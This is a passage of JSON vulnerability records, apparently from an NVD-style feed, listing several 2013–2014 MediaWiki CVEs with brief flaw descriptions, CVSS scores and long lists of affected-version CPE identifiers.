"cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.23.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.18:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6453", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-13T14:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site 
scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG file.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6452", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-13T13:36:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6452", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted pages via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6472", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-13T14:43:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", 
"cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 
"userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "title": "CVE-2013-6451", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-30T18:32:00", "cpe": [], "id": "CVE-2013-6451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T19:58:22", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "edition": 5, "cvss3": {}, "published": "2014-04-29T18:55:00", "title": "CVE-2014-2853", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2015-09-10T15:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.14.0", "cpe:/a:mediawiki:mediawiki:1.17", 
"cpe:/a:mediawiki:mediawiki:1.5.3", "cpe:/a:mediawiki:mediawiki:1.12.4", "cpe:/a:mediawiki:mediawiki:1.7.2", "cpe:/a:mediawiki:mediawiki:1.3.14", "cpe:/a:mediawiki:mediawiki:1.3.10", "cpe:/a:mediawiki:mediawiki:1.8.1", "cpe:/a:mediawiki:mediawiki:1.8.5", "cpe:/a:mediawiki:mediawiki:1.17.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.4.8", "cpe:/a:mediawiki:mediawiki:1.18", "cpe:/a:mediawiki:mediawiki:1.6.9", "cpe:/a:mediawiki:mediawiki:1.3.13", "cpe:/a:mediawiki:mediawiki:1.4.5", "cpe:/a:mediawiki:mediawiki:1.12.0", "cpe:/a:mediawiki:mediawiki:1.3", "cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.16.2", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.15.3", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.4.4", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.3.5", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.1.0", "cpe:/a:mediawiki:mediawiki:1.17.4", "cpe:/a:mediawiki:mediawiki:1.9.1", "cpe:/a:mediawiki:mediawiki:1.13.3", "cpe:/a:mediawiki:mediawiki:1.2.0", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.5.2", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.3.15", "cpe:/a:mediawiki:mediawiki:1.9.3", "cpe:/a:mediawiki:mediawiki:1.5.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.10.3", "cpe:/a:mediawiki:mediawiki:1.2.4", "cpe:/a:mediawiki:mediawiki:1.15.2", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.3.11", "cpe:/a:mediawiki:mediawiki:1.17.1", "cpe:/a:mediawiki:mediawiki:1.14.1", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.4.6", "cpe:/a:mediawiki:mediawiki:1.20", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.15.1", "cpe:/a:mediawiki:mediawiki:1.6.12", "cpe:/a:mediawiki:mediawiki:1.19.4", 
"cpe:/a:mediawiki:mediawiki:1.5.6", "cpe:/a:mediawiki:mediawiki:1.6.7", "cpe:/a:mediawiki:mediawiki:1.3.9", "cpe:/a:mediawiki:mediawiki:1.6.8", "cpe:/a:mediawiki:mediawiki:1.16.1", "cpe:/a:mediawiki:mediawiki:1.3.1", "cpe:/a:mediawiki:mediawiki:1.8.2", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.6.2", "cpe:/a:mediawiki:mediawiki:1.9.5", "cpe:/a:mediawiki:mediawiki:1.3.12", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.8.4", "cpe:/a:mediawiki:mediawiki:1.12.2", "cpe:/a:mediawiki:mediawiki:1.4.2", "cpe:/a:mediawiki:mediawiki:1.5.4", "cpe:/a:mediawiki:mediawiki:1.3.4", "cpe:/a:mediawiki:mediawiki:1.5", "cpe:/a:mediawiki:mediawiki:1.2.5", "cpe:/a:mediawiki:mediawiki:1.3.6", "cpe:/a:mediawiki:mediawiki:1.3.8", "cpe:/a:mediawiki:mediawiki:1.4.9", "cpe:/a:mediawiki:mediawiki:1.5.5", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.10.1", "cpe:/a:mediawiki:mediawiki:1.3.2", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.5.8", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.11.0", "cpe:/a:mediawiki:mediawiki:1.12.1", "cpe:/a:mediawiki:mediawiki:1.4.11", "cpe:/a:mediawiki:mediawiki:1.2.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.3.0", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.7.0", "cpe:/a:mediawiki:mediawiki:1.18.3", "cpe:/a:mediawiki:mediawiki:1.2.1", "cpe:/a:mediawiki:mediawiki:1.5.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.6.4", "cpe:/a:mediawiki:mediawiki:1.3.7", "cpe:/a:mediawiki:mediawiki:1.15.0", "cpe:/a:mediawiki:mediawiki:1.18.0", "cpe:/a:mediawiki:mediawiki:1.4.3", "cpe:/a:mediawiki:mediawiki:1.17.0", "cpe:/a:mediawiki:mediawiki:1.13.0", "cpe:/a:mediawiki:mediawiki:1.9.0", "cpe:/a:mediawiki:mediawiki:1.11.2", "cpe:/a:mediawiki:mediawiki:1.21.5", 
"cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.13.4", "cpe:/a:mediawiki:mediawiki:1.7.1", "cpe:/a:mediawiki:mediawiki:1.4.7", "cpe:/a:mediawiki:mediawiki:1.6.5", "cpe:/a:mediawiki:mediawiki:1.8.0", "cpe:/a:mediawiki:mediawiki:1.7.3", "cpe:/a:mediawiki:mediawiki:1.6.3", "cpe:/a:mediawiki:mediawiki:1.12.3", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.11.1", "cpe:/a:mediawiki:mediawiki:1.4.1", "cpe:/a:mediawiki:mediawiki:1.9.6", "cpe:/a:mediawiki:mediawiki:1.6.0", "cpe:/a:mediawiki:mediawiki:1.4.13", "cpe:/a:mediawiki:mediawiki:1.9.2", "cpe:/a:mediawiki:mediawiki:1.16.0", "cpe:/a:mediawiki:mediawiki:1.6.11", "cpe:/a:mediawiki:mediawiki:1.6.6", "cpe:/a:mediawiki:mediawiki:1.15.4", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.10.4", "cpe:/a:mediawiki:mediawiki:1.11", "cpe:/a:mediawiki:mediawiki:1.4.10", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.18.2", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.5.7", "cpe:/a:mediawiki:mediawiki:1.4", "cpe:/a:mediawiki:mediawiki:1.9.4", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.8.3", "cpe:/a:mediawiki:mediawiki:1.15.5", "cpe:/a:mediawiki:mediawiki:1.6.10", "cpe:/a:mediawiki:mediawiki:1.6.1", "cpe:/a:mediawiki:mediawiki:1.3.3", "cpe:/a:mediawiki:mediawiki:1.4.14", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.17.2", "cpe:/a:mediawiki:mediawiki:1.10.2", "cpe:/a:mediawiki:mediawiki:1.13.1", "cpe:/a:mediawiki:mediawiki:1.2.2", "cpe:/a:mediawiki:mediawiki:1.10.0", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.2.3", "cpe:/a:mediawiki:mediawiki:1.4.12", "cpe:/a:mediawiki:mediawiki:1.18.1", "cpe:/a:mediawiki:mediawiki:1.13.2", "cpe:/a:mediawiki:mediawiki:1.4.0", "cpe:/a:mediawiki:mediawiki:1.19.14"], "id": "CVE-2014-2853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2853", 
"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta5:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.3:*:*:*:*:*:*:*", 